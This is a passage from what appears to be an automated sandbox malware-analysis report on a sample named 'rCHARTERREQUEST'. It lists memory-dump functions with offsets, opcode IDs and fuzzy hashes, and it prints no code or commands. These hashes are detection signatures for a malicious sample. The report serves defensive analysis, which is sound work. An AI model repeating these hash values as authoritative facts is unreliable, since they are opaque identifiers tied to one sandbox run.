                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5ccda7016dc0520f66f56b4e23679cd522c47fc3fa3e9b83dc25aaf7650260f1
                                                                                                          • Instruction ID: 4554593f63a0fc6a930685c2ff5f12163a59f737edae724df8b62d74d8706209
                                                                                                          • Opcode Fuzzy Hash: 5ccda7016dc0520f66f56b4e23679cd522c47fc3fa3e9b83dc25aaf7650260f1
                                                                                                          • Instruction Fuzzy Hash: 17F0373490624CAFC781EB64D945AE97FBC9B45110F1041DAEC48D7651D6316E45C7A1
                                                                                                          Function 06D373E0 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cacc5960b5927073ca5bb23b23d20e75679932067b9ed468d609885c6dbf6583
                                                                                                          • Instruction ID: 37e700dab28c7c2dd34ffa0ff8af3ef65fca1e408834345e5b0669c77f14fdba
                                                                                                          • Opcode Fuzzy Hash: cacc5960b5927073ca5bb23b23d20e75679932067b9ed468d609885c6dbf6583
                                                                                                          • Instruction Fuzzy Hash: 01F03A74E05208AFC795DFA8C9016EDBFF4EB49300F10C0AAE854A7341C6316A02EB91
                                                                                                          Function 06D39B28 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e7fbf4b57ff6c2d8a28ed569574432566f64791121b84d7967fc54302559350
                                                                                                          • Instruction ID: 36b0228b2fcf04989a868016cce7c5dfa5ebf425ffcb737726d01922eff6cebe
                                                                                                          • Opcode Fuzzy Hash: 6e7fbf4b57ff6c2d8a28ed569574432566f64791121b84d7967fc54302559350
                                                                                                          • Instruction Fuzzy Hash: 15F08230E07208AFC781DFA8C8915DCBBF4EB49200F2080DAD808D7381D6755A02DB80
                                                                                                          Function 06D3A879 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34c2ba67191da3f4f0bed13887639167d41398fe663eb4a0fcf783823b56b48b
                                                                                                          • Instruction ID: 2dd88ea2944448f3bfa43c2123bae522ab5c0cfe7430beb1ae7b080b6aee4482
                                                                                                          • Opcode Fuzzy Hash: 34c2ba67191da3f4f0bed13887639167d41398fe663eb4a0fcf783823b56b48b
                                                                                                          • Instruction Fuzzy Hash: 59F08230E06248BFC780CFA8D9406EDBBF4EB49300F24C5DAE848E7341D6315A02DB91
                                                                                                          Function 06D45078 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75624afc97c46de694887c2fea17f868abe6ebb83648089f08116878b212c0dd
                                                                                                          • Instruction ID: 3ddc5ae3344d35eae2361298517b1a319755c376fb7172cfc3dc79f9229694a1
                                                                                                          • Opcode Fuzzy Hash: 75624afc97c46de694887c2fea17f868abe6ebb83648089f08116878b212c0dd
                                                                                                          • Instruction Fuzzy Hash: ADF0FE353506009FC715DB19D854D3AB7AAEFC9721B1580A9FA568B760CB71EC42CB90
                                                                                                          Function 06D41120 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 90712d7ab5c7467751a95e6a3711ae006ae47bc49f37067e48c9a507994d5812
                                                                                                          • Instruction ID: 2105656c8e0154e6fed8fc23704cc8ec1af22ed3c853a7002cd260815a624b28
                                                                                                          • Opcode Fuzzy Hash: 90712d7ab5c7467751a95e6a3711ae006ae47bc49f37067e48c9a507994d5812
                                                                                                          • Instruction Fuzzy Hash: 56F0A7312053455FC7119A2AEC8488BFF6ADFC1224B14857AE14A87636DB709D4987A0
                                                                                                          Function 01808940 Relevance: .0, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1fac1195d8b0814a0145f48aa7c7f301e4f86158bd674850e39ebac468723067
                                                                                                          • Instruction ID: c6189a1aa7017a4dd64e0d04d390e1680200e9c00ee565873ba63fb6634d49c2
                                                                                                          • Opcode Fuzzy Hash: 1fac1195d8b0814a0145f48aa7c7f301e4f86158bd674850e39ebac468723067
                                                                                                          • Instruction Fuzzy Hash: D4F08C3694A3198FCBA25AD4E8116EC7BB89B46375F0150A3E404E21A3C27807D9DB31
                                                                                                          Function 06B82A40 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3be5d22ba5e411fb9f5ed8c336de2b5706480143eaf64896dc69c4936311f3ee
                                                                                                          • Instruction ID: 6b21ad7acdd6268dfe8866f17d53511c2f4ddd4b516c69b3de62c1df8c3bcdde
                                                                                                          • Opcode Fuzzy Hash: 3be5d22ba5e411fb9f5ed8c336de2b5706480143eaf64896dc69c4936311f3ee
                                                                                                          • Instruction Fuzzy Hash: 76F03A3490A208EFCB51DFA8D940AADBFB5EF49310F1091DAAC14A7392C6329B11DB91
                                                                                                          Function 06D3A750 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e11b3738df19249018de97ac982937e65e84bed163d6a59cd68a817bd8647e61
                                                                                                          • Instruction ID: a7831af67e6c17289b3ae19413d45d3f81a2c598fc298815d5da01cb7f642bec
                                                                                                          • Opcode Fuzzy Hash: e11b3738df19249018de97ac982937e65e84bed163d6a59cd68a817bd8647e61
                                                                                                          • Instruction Fuzzy Hash: F3F0E574A0A208AFC705CF70DC419AEBF759B05300F1480DAE88567382C6325E02DBE1
                                                                                                          Function 06D37C91 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3893f47756730d762a385306d865f0541aab982bb7db52b992b97f8bb79d8b07
                                                                                                          • Instruction ID: 3fb5b0ca2d8bb1e1a7d0e0b2559c06a202f73797cf598aaab3648f7192828297
                                                                                                          • Opcode Fuzzy Hash: 3893f47756730d762a385306d865f0541aab982bb7db52b992b97f8bb79d8b07
                                                                                                          • Instruction Fuzzy Hash: 6FF01C74E0A218EFC784DFA8D8406EDBBF4AB4A200F1481DAE858A7352D6355B16DB91
                                                                                                          Function 06D36D18 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 720f3f7f98c629d0d362a3deaee177c5d5d0cec9966f2b3be86e5d31431c2ce9
                                                                                                          • Instruction ID: 8ae44831b3c00de912382cf2f5b83e67aa991ef3476f83978f79d2c776c24277
                                                                                                          • Opcode Fuzzy Hash: 720f3f7f98c629d0d362a3deaee177c5d5d0cec9966f2b3be86e5d31431c2ce9
                                                                                                          • Instruction Fuzzy Hash: CBF09A70E09248AFCB82DFB8D80469CBFB5EB49300F14C0EAE84897302D6319A11DB40
                                                                                                          Function 06D42B49 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 26b31f1cfe325dfc3c1ffb344241d976760b58003b1c9c99c9ca4a83bed5f795
                                                                                                          • Instruction ID: 500ff7ebca884b349660cc9b6ac2e17f8d9489cbb9649e47a5a7f065e9ffb70c
                                                                                                          • Opcode Fuzzy Hash: 26b31f1cfe325dfc3c1ffb344241d976760b58003b1c9c99c9ca4a83bed5f795
                                                                                                          • Instruction Fuzzy Hash: A5E022303013645BC71223B8B80489B7FAECA8622130281A6F52ECB7D9CA118D03C3F2
                                                                                                          Function 01800841 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb99de7dd8b4dee24e5605d4eba6ef5b764edf341d9aaf693a19e56bb4be3c43
                                                                                                          • Instruction ID: 8b4e2003ab4b5e03b2249862996e534bdebf774db27dda250cf325827c465fcf
                                                                                                          • Opcode Fuzzy Hash: cb99de7dd8b4dee24e5605d4eba6ef5b764edf341d9aaf693a19e56bb4be3c43
                                                                                                          • Instruction Fuzzy Hash: BAE0123558D7C14FC75347E0AC646947FF0AE8327471A09EBD495CB163C29D48CA8712
                                                                                                          Function 06C650D8 Relevance: .0, Instructions: 31COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 76d63df6e6a70f89fd1b8151a4f5c661796e87087576a1e34dbe45223414fe72
                                                                                                          • Instruction ID: 585a6cf9a98529e9de10d3b9c6199cd37b6a6154146e887360b02d32c085c468
                                                                                                          • Opcode Fuzzy Hash: 76d63df6e6a70f89fd1b8151a4f5c661796e87087576a1e34dbe45223414fe72
                                                                                                          • Instruction Fuzzy Hash: CCF01775E04208AFCB84DFA9D850AADBBF5AB4C311F14C09AA81997341D6358A12EB40
                                                                                                          Function 06B872E9 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 50de1dcc2084357aac61bb189a2371b72de84e0d3174f5e3268a3e1c3bc2448c
                                                                                                          • Instruction ID: d480967dde2c9c8f5bf201337b155eba5b4bf6827e5ad35e01ba16915c822a1e
                                                                                                          • Opcode Fuzzy Hash: 50de1dcc2084357aac61bb189a2371b72de84e0d3174f5e3268a3e1c3bc2448c
                                                                                                          • Instruction Fuzzy Hash: 890119B09092588FDB40DF29D880A9CBBB1FF56308F1480FAE409A7256DB381986CB00
                                                                                                          Function 06B89AD2 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 41e18210061285f84c38ca899bd3ea6ac6f9e84b70c4e950f3ea78013f781b25
                                                                                                          • Instruction ID: 09425d4b26a38dea79815f0fad2e8e80e2e6e078391be7fc70c9b067bce2f03e
                                                                                                          • Opcode Fuzzy Hash: 41e18210061285f84c38ca899bd3ea6ac6f9e84b70c4e950f3ea78013f781b25
                                                                                                          • Instruction Fuzzy Hash: CFF0B474D05208EFCB81DFA8D84099CFFB0EB09300F05C0DAE85893351C6315E45DB51
                                                                                                          Function 06B86A68 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9afe8d35f16427fa1834f338a6b98b7965c6a64d09b296bd99e3cc8b61d4946e
                                                                                                          • Instruction ID: cc86dc9e2f2873cbdbcc460cd8218985d9a3697fba7598dc7d696540f6cc630e
                                                                                                          • Opcode Fuzzy Hash: 9afe8d35f16427fa1834f338a6b98b7965c6a64d09b296bd99e3cc8b61d4946e
                                                                                                          • Instruction Fuzzy Hash: 38F05EB4E05248EFC795DFA8C80069CBBF0EB59300F24C0DAD858D7351D631AA05DB81
                                                                                                          Function 07045448 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3d24ed39118c5276bfbb7b5b0793a405425cad36cd81293160672eaf01d7d0f
                                                                                                          • Instruction ID: b95bfb6e870f6fedd3544f947b299d5376895ed72b8777c58bf531d3b181fb5c
                                                                                                          • Opcode Fuzzy Hash: e3d24ed39118c5276bfbb7b5b0793a405425cad36cd81293160672eaf01d7d0f
                                                                                                          • Instruction Fuzzy Hash: 6501DAB4904119CFDBA4DF54D8947ED76FAEB49304F4081EAD219B7650DB384EC58F42
                                                                                                          Function 06D3C611 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: eab052d85995c5cd11bbf6732fc89df74b98e6cd89d26b48c65cb5787899f597
                                                                                                          • Instruction ID: 3272237ddb35db98e256621906a6a169d9a79ebb84434daf4947c1efa19faa6d
                                                                                                          • Opcode Fuzzy Hash: eab052d85995c5cd11bbf6732fc89df74b98e6cd89d26b48c65cb5787899f597
                                                                                                          • Instruction Fuzzy Hash: 10E022363002508FC341CF29DC40D997BB5BF8A22076180DAF001CB672C336C800CB60
                                                                                                          Function 06D35CDA Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e66abf594fb8b964322f14ab03cbc2411a3ec5c952fb8e036029b18ca86d9a21
                                                                                                          • Instruction ID: b40eb4e287d7b681fcd4586d466d93e92f9031325cedc18409c5dcea3d5aa623
                                                                                                          • Opcode Fuzzy Hash: e66abf594fb8b964322f14ab03cbc2411a3ec5c952fb8e036029b18ca86d9a21
                                                                                                          • Instruction Fuzzy Hash: BA014974E00228DFDB54CFA9E4887ADB7F2FB8A309F458064E105A7281CB389881CF01
                                                                                                          Function 06D3FD3A Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f4ffbf27a7bd11b375d2a13ec9131a77b058866ca5b0a9fe27ac2e1e7292101
                                                                                                          • Instruction ID: 5030e7f9493506bc39ad2fe4829b8000f7763ad45d341d3a26a47ae107c9e9fc
                                                                                                          • Opcode Fuzzy Hash: 4f4ffbf27a7bd11b375d2a13ec9131a77b058866ca5b0a9fe27ac2e1e7292101
                                                                                                          • Instruction Fuzzy Hash: 23E06831A46378AFDBE21731AC05B9137A98B03201F1808D6F940AF5E1C563D801C3F2
                                                                                                          Function 06D410DA Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ee00475dcb60345d3c1ceab4a4b48703cce62c7563d628c979b6ea95ce189a6b
                                                                                                          • Instruction ID: 70f91aef6d94159c195b1f5814a7f2014ed0f513e85fbc67975aea63b164e14f
                                                                                                          • Opcode Fuzzy Hash: ee00475dcb60345d3c1ceab4a4b48703cce62c7563d628c979b6ea95ce189a6b
                                                                                                          • Instruction Fuzzy Hash: 9FE02632B061A1179BE0250EBC40A7BC4A9DBC8950B81013EFD0AC7300C540CC4283E0
                                                                                                          Function 06B8AFC8 Relevance: .0, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bdb5a49a5c6310f6bdad74c2f78750ff1cfd47727fd5c71962a6717e4b845301
                                                                                                          • Instruction ID: ecbc3c77a90aa8f9e1729264d638fa2ef15178bb558dd844ebb852a899799bed
                                                                                                          • Opcode Fuzzy Hash: bdb5a49a5c6310f6bdad74c2f78750ff1cfd47727fd5c71962a6717e4b845301
                                                                                                          • Instruction Fuzzy Hash: 51F05EB5D09208AFC785DFA8C800AECBFF0EB59300F1480EAD888D3351DA315A41DB41
                                                                                                          Function 06D389DC Relevance: .0, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4ce08c3dbac6b4f7d89ac1f1ee7def1ba29aba6522ddb4ce2d5c312d10fbae98
                                                                                                          • Instruction ID: 24f5d8bf4ceca02f6649d31a5e2c3663cb8f76ba4b8ad0504823df69799e169e
                                                                                                          • Opcode Fuzzy Hash: 4ce08c3dbac6b4f7d89ac1f1ee7def1ba29aba6522ddb4ce2d5c312d10fbae98
                                                                                                          • Instruction Fuzzy Hash: F501DAB8A04219CFDB64DF25D894B9DBBB2FB85308F1040A9E519B7384DB385E84CF01
                                                                                                          Function 06B82D28 Relevance: .0, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cbe744023ddfad76ae94bbb80dacc980de5bd643b2a76eadc97fa85a99616e75
                                                                                                          • Instruction ID: c59a580b05e0a428f4d66c0f0118c400336a4b2b28ff10b53162b354e6d065ac
                                                                                                          • Opcode Fuzzy Hash: cbe744023ddfad76ae94bbb80dacc980de5bd643b2a76eadc97fa85a99616e75
                                                                                                          • Instruction Fuzzy Hash: 1AF01C74E05108AFD794DFA8D5456ECBBF5EB48300F20C0A9981997341DA759A46DF81
                                                                                                          Function 06D38AF8 Relevance: .0, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4c47fcf8195ac137175df95aedea5ac8db26a766214f72d3252388d3de8f27e1
                                                                                                          • Instruction ID: e6be97bc73c83ee370d8409099392cf160aa33f34a49c801d0a046068cfc5f47
                                                                                                          • Opcode Fuzzy Hash: 4c47fcf8195ac137175df95aedea5ac8db26a766214f72d3252388d3de8f27e1
                                                                                                          • Instruction Fuzzy Hash: 3601E4B4A00218CFD764DF29E488798B7B2FB95304F5041A4E109A7250D7785DC8CF00
                                                                                                          Function 06D38818 Relevance: .0, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9b899451a538d212355ee835bb447691ab0930cb66b300311488f59ce490a9a
                                                                                                          • Instruction ID: 62f6ee1fa23ad7c87aff75d0f5fa55d8061e6cfe3bead13b914686179047bc3e
                                                                                                          • Opcode Fuzzy Hash: a9b899451a538d212355ee835bb447691ab0930cb66b300311488f59ce490a9a
                                                                                                          • Instruction Fuzzy Hash: 4901B2B4E10228CFDB68DF29E4847E8B7F2FB89314F5044A5E60AA7290DB785D848F01
                                                                                                          Function 06B836F0 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1c06bd28d5f4766989c2850010f6d9827d6fb4a3e047ae9cf09c1d9d6223b77
                                                                                                          • Instruction ID: 6a227c44fc6176dc926af20ea154952e33e2427ed40bd5e68a8ffa120630dff2
                                                                                                          • Opcode Fuzzy Hash: a1c06bd28d5f4766989c2850010f6d9827d6fb4a3e047ae9cf09c1d9d6223b77
                                                                                                          • Instruction Fuzzy Hash: 3BF0FEB5909208EFCB45DF98D8409ECBBB5FB49310F1480AAEC54A7351D6329A65DB81
                                                                                                          Function 06B82548 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5d1ff8aba544d2e851119011b2e523163849ebf927e9dbc4777883e03ae3de60
                                                                                                          • Instruction ID: 68c430fcb1a489a1610be07bfeac98098cf8447eb2a3712aa3d8451f1da80317
                                                                                                          • Opcode Fuzzy Hash: 5d1ff8aba544d2e851119011b2e523163849ebf927e9dbc4777883e03ae3de60
                                                                                                          • Instruction Fuzzy Hash: 16F0D475D0520CEFCB81DF98D940AEDBBB5FB48300F10C099AD18A3211D7329A61EF80
                                                                                                          Function 06B8C2E8 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
